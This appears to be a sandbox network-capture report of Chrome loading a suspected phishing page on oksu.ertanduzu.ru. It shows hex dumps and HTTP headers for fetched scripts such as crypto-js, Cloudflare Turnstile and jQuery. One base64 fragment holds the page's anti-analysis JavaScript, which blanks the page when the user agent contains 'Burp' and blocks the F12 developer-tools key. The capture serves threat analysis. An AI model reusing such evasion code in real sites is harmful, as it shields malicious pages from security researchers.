                                                                                                                                                                                                                                                2024-12-20 15:45:59 UTC1369INData Raw: 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 31 6c 74 5a 6b 4e 5a 59 6c 42 4f 52 6d 38 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 31 6c 74 5a 6b 4e 5a 59 6c 42 4f 52 6d 38 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 57 57 31 6d 51 31 6c 69 55 45 35 47 62 79 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 31 6c 74 5a 6b 4e 5a 59 6c 42 4f 52 6d 38 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35
                                                                                                                                                                                                                                                Data Ascii: LWhlaWdodDoxLjI7fQ0KI1ltZkNZYlBORm8gaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI1ltZkNZYlBORm8gaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojWW1mQ1liUE5GbyBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1ltZkNZYlBORm8uY2FwdGNoYS1jb25
                                                                                                                                                                                                                                                2024-12-20 15:45:59 UTC1369INData Raw: 58 4a 42 5a 32 56 75 64 43 35 70 62 6d 4e 73 64 57 52 6c 63 79 67 69 51 6e 56 79 63 43 49 70 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30
                                                                                                                                                                                                                                                Data Ascii: XJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                50192.168.2.1149867104.17.24.144436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://oksu.ertanduzu.ru/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC958INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:01 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                ETag: W/"61182885-40eb"
                                                                                                                                                                                                                                                Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                Age: 165416
                                                                                                                                                                                                                                                Expires: Wed, 10 Dec 2025 15:46:01 GMT
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L11qM6orAXnt8WUmJ9g1w6w6CT6Whzt2O6Aw2i3lft0pLCD44p%2FQvALpgCbiTZMYMHJ9bwawbRMIrMw0hEOuU4MkAcs9a2wL%2Fij9BStN5LRPvIP7w36SbdIJExuCXlZ6Aq42QE%2F9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c3485eccde98-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC411INData Raw: 37 62 66 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                                                Data Ascii: 7bf3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC1369INData Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61
                                                                                                                                                                                                                                                Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC1369INData Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29
                                                                                                                                                                                                                                                Data Ascii: all(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC1369INData Raw: 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b
                                                                                                                                                                                                                                                Data Ascii: eof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC1369INData Raw: 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30
                                                                                                                                                                                                                                                Data Ascii: ar t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC1369INData Raw: 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d
                                                                                                                                                                                                                                                Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC1369INData Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75
                                                                                                                                                                                                                                                Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC1369INData Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51
                                                                                                                                                                                                                                                Data Ascii: arAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC1369INData Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73
                                                                                                                                                                                                                                                Data Ascii: .sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC1369INData Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b
                                                                                                                                                                                                                                                Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                51192.168.2.1149868104.18.95.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://oksu.ertanduzu.ru/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC386INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:01 GMT
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                location: /turnstile/v0/b/787bc399e22f/api.js
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c3485fde5e67-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                52192.168.2.1149869151.101.194.1374436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                Host: code.jquery.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://oksu.ertanduzu.ru/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Content-Length: 89501
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:01 GMT
                                                                                                                                                                                                                                                Age: 3231094
                                                                                                                                                                                                                                                X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890095-NYC
                                                                                                                                                                                                                                                X-Cache: HIT, HIT
                                                                                                                                                                                                                                                X-Cache-Hits: 55, 7
                                                                                                                                                                                                                                                X-Timer: S1734709562.651005,VS0,VE0
                                                                                                                                                                                                                                                Vary: Accept-Encoding
